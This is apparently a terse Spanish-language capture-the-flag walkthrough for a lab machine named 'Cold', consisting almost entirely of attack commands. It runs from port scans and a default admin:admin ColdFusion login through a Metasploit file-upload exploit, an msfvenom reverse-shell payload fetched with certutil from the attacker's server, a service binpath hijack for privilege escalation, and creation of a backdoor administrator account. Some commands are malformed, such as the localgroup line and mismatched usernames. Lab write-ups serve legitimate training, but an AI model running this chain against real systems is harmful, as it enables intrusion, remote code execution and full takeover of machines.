nmap -A -p- -oA cold 172.31.1.15 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210709141735.png

nmap -sC -sV -O -p- -oA cold 172.31.1.15

nmap -sU -O -p- -oA cold-udp 172.31.1.15

nikto -h 172.31.1.15:8500

gobuster dir -k -u http://172.31.1.15:8500/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210709141934.png

Nos dirigimos a http://172.31.1.15/CFIDE/administrator/

Pasted image 20210709142338.png

Usamos las credenciales admin:admin

Nos metemos en ajustes y vemos la version

Pasted image 20210709142817.png

use exploit/multi/http/coldfusion_ckeditor_file_upload  
set RHOSTS 172.31.1.15  
set LHOST 10.10.0.12  
run

Pasted image 20210709151956.png

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f exe > cold_shell.exe

python3 -m http.server 8888

certutil.exe -urlcache -f http://10.10.0.12:8888/cold_shell.exe cold_shell.exe

Pasted image 20210709152300.png

nc -lvnp 5555

Pasted image 20210709153029.png

python3 -m http.server 8888

certutil.exe -urlcache -f http://10.10.0.12:8888/winPEASany.exe winpease.exe

winpease.exe

Pasted image 20210709153548.png

sc config cold binpath='C:\ColdFusion2018\cfusion\bin\cold_shell.exe'

sc start cold

nc -lvnp 5555

Pasted image 20210709161557.png

net user cu3rv0x /add

net localgroup cu3rv0x Administrator cu3rv0x /add

crackmapexec winrm 172.31.1.15 -u cu3rvox -p pass12345678! -x 'whoami'

Pasted image 20210709161655.png

boxes

copyright©2022 Cu3rv0x all rights reserved